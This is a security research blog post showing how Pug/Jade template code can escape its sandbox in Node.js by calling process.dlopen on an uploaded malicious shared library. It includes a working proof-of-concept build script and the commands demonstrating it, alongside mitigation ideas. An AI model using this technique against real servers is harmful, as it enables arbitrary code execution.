UPDATE #2: James Kettle pointed out a far simpler Jade breakout a full year before I published this. I wish I had seen that before embarking on my research... =/
Not long ago I was asked by a client to provide a short training on writing secure Node.js applications. As part of the class, I decided to build an intentionally vulnerable Express application (under Node 4.x) that allowed insecure file uploads. In one scenario I created, the application was susceptible to a directory traversal vulnerability, allowing students to upload arbitrary Jade/Pug templates that the application would later execute. I'm not sure how common this condition is in Express applications, but it is plausible that it could show up in real-world apps.
Pug does allow server-side JavaScript execution from within templates, so when I was initially building this vulnerable application I assumed students would be able to immediately set up whatever backdoor they chose from within their malicious templates. However, I quickly realized I was mistaken! In fact, Pug sets up only a very limited scope/namespace for code to execute within. Most Node.js global variables are not available, and require() isn't available, making it very hard to get access to fun things like child_process.exec(). The Jade developers have set up a makeshift sandbox for this template code, which is great to see. Of course, for someone like me, a sandbox doesn't look so much like a road block as it looks like a fun challenge. ;-) Clearly, if a developer were to explicitly expose local variables to Pug when evaluating a template, and those local variables had dangerous methods or otherwise exposed important functionality, then an attacker might be able to leverage that application-specific capability from within Pug to escalate privileges. However, that's speculative at best and will vary from one app to the next, so it would be more interesting if there were a general-purpose way to break out of Pug.
As basic reconnaissance, I began to enumerate the few global variables that are exposed in Pug. I started with a simple template and tested it from the command line:
$ echo '- for (var prop in global) { console.log(prop); }' > enumerate.jade
$ jade enumerate.jade
global
process
GLOBAL
root
Buffer
clearImmediate
clearInterval
clearTimeout
setImmediate
setInterval
setTimeout
console
rendered enumerate.html
Next, I began just printing out one object at a time to see a listing of methods and such, but it seemed like some pretty slim pickings. I'll spare you the excitement of how many methods and APIs I read about over the next hour or so. Yet even a blind dog finds a bone now and then, and finally I stumbled across an interesting method in the process object:
...
_debugProcess: [Function: _debugProcess],
_debugPause: [Function: _debugPause],
_debugEnd: [Function: _debugEnd],
hrtime: [Function: hrtime],
dlopen: [Function: dlopen],
uptime: [Function: uptime],
memoryUsage: [Function: memoryUsage],
binding: [Function: binding],
...
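This kind of exploration can be reproduced from plain Node, outside any template. A quick check (the exact property list varies by Node version):

```javascript
// List the function-valued properties hanging directly off `process`.
// On the Node 4.x builds discussed here, undocumented entries such as
// dlopen and binding show up alongside the documented API.
var procFns = Object.keys(process).filter(function (name) {
  return typeof process[name] === 'function';
});
console.log(procFns.sort().join(', '));
```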
That scratched a part of my brain that is firmly outside of Node.js land. Of course! This is a wrapper to dlopen(3). Shared libraries (e.g. .so files, or .dll files on lesser operating systems) are code, and that is going to pique any hacker's interest. This method does not appear in the Node.js documentation, but it is definitely discussed around the webbernet in the context of Node.js, if you look for it. As it turns out, the Node.js wrapper to dlopen expects shared libraries to be proper Node-formatted modules. These are just regular shared libraries with certain additional symbols defined, and to be honest, I haven't absorbed every detail with respect to what these modules look like. But suffice it to say, you can't just load up the libc shared library and call system(3) to get your jollies, since Node's dlopen will blow up once it realizes libc.so isn't a proper Node module.
Of course we could use dlopen to load up any native Node module that is already installed as a dependency of the application. An attacker may need to know the full path to the pre-installed module, but one could guess that with a bit of knowledge of the standard install directories. That would afford an attacker access to any functionality provided by the module from within Pug, which could provide a stepping stone to arbitrary code execution. But once again, that's going to be installation/application-specific and isn't nearly as fun as a general-purpose escalation.
Recall, however, that my intentionally vulnerable Express application allows file uploads! That's how I'm giving my students access to run Pug templates in the first place. So in this scenario, the attacker can just upload their own Node module as a separate file, containing whatever functionality they choose, and invoke it to gain access to that functionality within Pug code. The obvious way to do this would be to set up a proper Node build chain that creates a natively-compiled module. That seemed like a lot of work to me, so I came up with a short-cut. In order to load a module, Node needs to first call libc's dlopen. This function doesn't have nearly the pesky requirements that Node's module system does. What's more, libc (and Windows, for that matter) has the option to execute arbitrary code during the module load process. So before libc's dlopen even returns (and allows Node to verify the module exports), we can execute any code we like. This is how I compiled my proof-of-concept payload, using a simple shell script:
#!/bin/sh
NAME=evil
echo "INFO: Temporarily writing a C source file to /tmp/${NAME}.c"
cat > /tmp/${NAME}.c <<END
#include <stdio.h>
#include <stdlib.h>
/* GCC-ism designating the onload function to execute when the library is loaded */
static void onload() __attribute__((constructor));
/* Should see evidence of successful execution on stdout and in /tmp. */
void onload()
{
    printf("EVIL LIBRARY LOADED\n");
    system("touch /tmp/hacked-by-evil-so");
}
END
echo "INFO: Now compiling the code as a shared library..."
gcc -c -fPIC /tmp/${NAME}.c -o ${NAME}.o\
&& gcc ${NAME}.o -shared -o lib${NAME}.so
echo "INFO: Cleaning up..."
rm ${NAME}.o /tmp/${NAME}.c
echo "INFO: Final output is lib${NAME}.so in the current directory."
To test it locally, I simply ran this script to create the binary, and ran a bit of Pug code to attempt to load it as a module:
$ ./make-evil-so.sh
INFO: Temporarily writing a C source file to /tmp/evil.c
INFO: Now compiling the code as a shared library...
INFO: Cleaning up...
INFO: Final output is libevil.so in the current directory.
$ echo "- process.dlopen('evil', './libevil.so')" > test.jade
$ jade test.jade
EVIL LIBRARY LOADED
/usr/local/lib/node_modules/jade/lib/runtime.js:240
throw err;
^
Error: test.jade:1
> 1| - process.dlopen('evil', './libevil.so')
2|
Module did not self-register.
at Error (native)
at eval (eval at <anonymous> (/usr/local/lib/node_modules/jade/lib/index.js:218:8), <anonymous>:11:9)
at eval (eval at <anonymous> (/usr/local/lib/node_modules/jade/lib/index.js:218:8), <anonymous>:13:22)
at res (/usr/local/lib/node_modules/jade/lib/index.js:219:38)
at renderFile (/usr/local/lib/node_modules/jade/bin/jade.js:270:40)
at /usr/local/lib/node_modules/jade/bin/jade.js:136:5
at Array.forEach (native)
at Object.<anonymous> (/usr/local/lib/node_modules/jade/bin/jade.js:135:9)
at Module._compile (module.js:409:26)
at Object.Module._extensions..js (module.js:416:10)
$ ls -la /tmp/*hack*
-rw-r--r-- 1 tim tim 0 Aug 26 19:23 /tmp/hacked-by-evil-so
As we expect, the library file fails to load as a true Node module, but the library's onload() function clearly ran with code of our choosing. Needless to say, this worked like a charm against the vulnerable app I created for the students.
Summary
Clearly this attack was possible because I set up the vulnerable application to accept file uploads in an unsafe way, which gave students access both to execute Jade/Pug templates and to upload shared libraries to complete the escalation. This may be a fairly uncommon situation in practice. However, there are a few other corner cases where an attacker may be able to leverage a similar sequence of steps leading to code execution. For instance, if a Pug template were vulnerable to an eval() injection during server-side JavaScript execution, then that would give an attacker access to the sandboxed execution context without needing to upload any files. From there, an attacker may be able to do one of the following to break out of the sandbox:
- Any objects explicitly exposed to Pug in local variables by the application's developer could be leveraged to perhaps escalate privileges within the application or operating system, depending on the functionality exposed
- Pre-installed native modules could be loaded up using dlopen, and any functionality in those could perhaps be used to escalate privileges
- Under Windows, it may be possible to use dlopen with UNC paths to fetch a library payload from a remote server (I haven't tested this... would love to hear if others find it is possible!)
Finally, I just want to make clear that I don't really fault the Pug developers for allowing this to occur. The code execution restrictions they have implemented really should be seen as a best-effort security measure. It is proactive and they should be applauded for it. The restricted namespace will certainly make an attacker's life difficult in many situations, and we can't expect the Pug developers to know about every little undocumented feature in the Node.js API. With that said: Should the Pug folks find a way to block dlopen access? Yes, probably. There's no good reason to expose this to Pug code in the vast majority of applications, and if a developer really wanted it, they could expose it via local variables.
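For what it's worth, one way such a block could work is the same shadowing trick used for locals, applied defensively. This is purely illustrative and not Pug's code: compile the template body with the dangerous names as parameters that are never supplied, so they read as undefined inside it.

```javascript
// Illustrative mitigation sketch (NOT Pug's actual implementation):
// shadow dangerous globals inside an eval-style template scope.
function renderBlocked(templateJs) {
  var blocked = ['process', 'global', 'GLOBAL', 'root', 'require'];
  // Each blocked name becomes a parameter that is never supplied, so
  // template code sees undefined instead of the real global object.
  var fn = Function.apply(null, blocked.concat(templateJs));
  return fn();
}

// Outside the sandbox, `process` is the usual global object; inside,
// the shadowed name resolves to undefined:
console.log(typeof process);
console.log(renderBlocked('return typeof process;'));
```

A real fix would be more surgical (e.g. exposing a wrapped process object without dlopen), but the shadowing approach shows the basic idea.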